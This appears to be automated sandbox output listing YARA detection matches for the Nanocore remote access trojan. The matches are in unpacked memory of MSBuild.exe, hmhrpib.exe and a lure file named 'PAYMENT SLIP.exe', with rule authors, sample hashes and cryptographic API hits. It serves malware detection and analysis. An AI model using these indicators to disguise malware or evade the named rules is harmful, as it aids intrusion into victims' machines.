        Source: 12.2.MSBuild.exe.48e703e.26.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.48e703e.26.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.1830000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.1830000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 8.2.hmhrpib.exe.2f30000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 8.2.hmhrpib.exe.2f30000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 8.2.hmhrpib.exe.2f30000.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.MSBuild.exe.48632ce.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.48632ce.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 8.2.hmhrpib.exe.2f30000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 8.2.hmhrpib.exe.2f30000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 8.2.hmhrpib.exe.2f30000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 19.2.MSBuild.exe.40feae4.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 19.2.MSBuild.exe.40feae4.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.17a0000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.17a0000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.17e0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.17e0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.4507ac8.19.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.4507ac8.19.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.3530f30.17.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.3530f30.17.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.61a0000.33.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.61a0000.33.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.MSBuild.exe.3f59cae.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.MSBuild.exe.3f59cae.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.MSBuild.exe.3f59cae.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.MSBuild.exe.46574b4.21.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.46574b4.21.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.1810000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.1810000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 19.2.MSBuild.exe.40f9cae.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 19.2.MSBuild.exe.40f9cae.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 19.2.MSBuild.exe.40f9cae.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.MSBuild.exe.3530f30.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.3530f30.17.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.2.MSBuild.exe.3f6310d.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.MSBuild.exe.3f6310d.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.1870000.14.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.1870000.14.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.MSBuild.exe.3f5eae4.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.MSBuild.exe.3f5eae4.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.17c0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.17c0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.61a4629.32.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.61a4629.32.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.3545564.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.3545564.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.3545564.16.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.MSBuild.exe.17d0000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.17d0000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.1430000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.1430000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.3524cf0.18.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.3524cf0.18.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.MSBuild.exe.466a56f.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.466a56f.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.61a0000.33.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.61a0000.33.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 1.2.PAYMENT SLIP.exe.2400000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 1.2.PAYMENT SLIP.exe.2400000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 1.2.PAYMENT SLIP.exe.2400000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 19.2.MSBuild.exe.410310d.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 19.2.MSBuild.exe.410310d.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.46658d0.22.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.46658d0.22.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.17a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.17a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.1844c9f.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.1844c9f.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 13.2.hmhrpib.exe.2f30000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 13.2.hmhrpib.exe.2f30000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 13.2.hmhrpib.exe.2f30000.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 19.2.MSBuild.exe.30d3c74.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 19.2.MSBuild.exe.30d3c74.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 12.2.MSBuild.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: 12.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 19.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
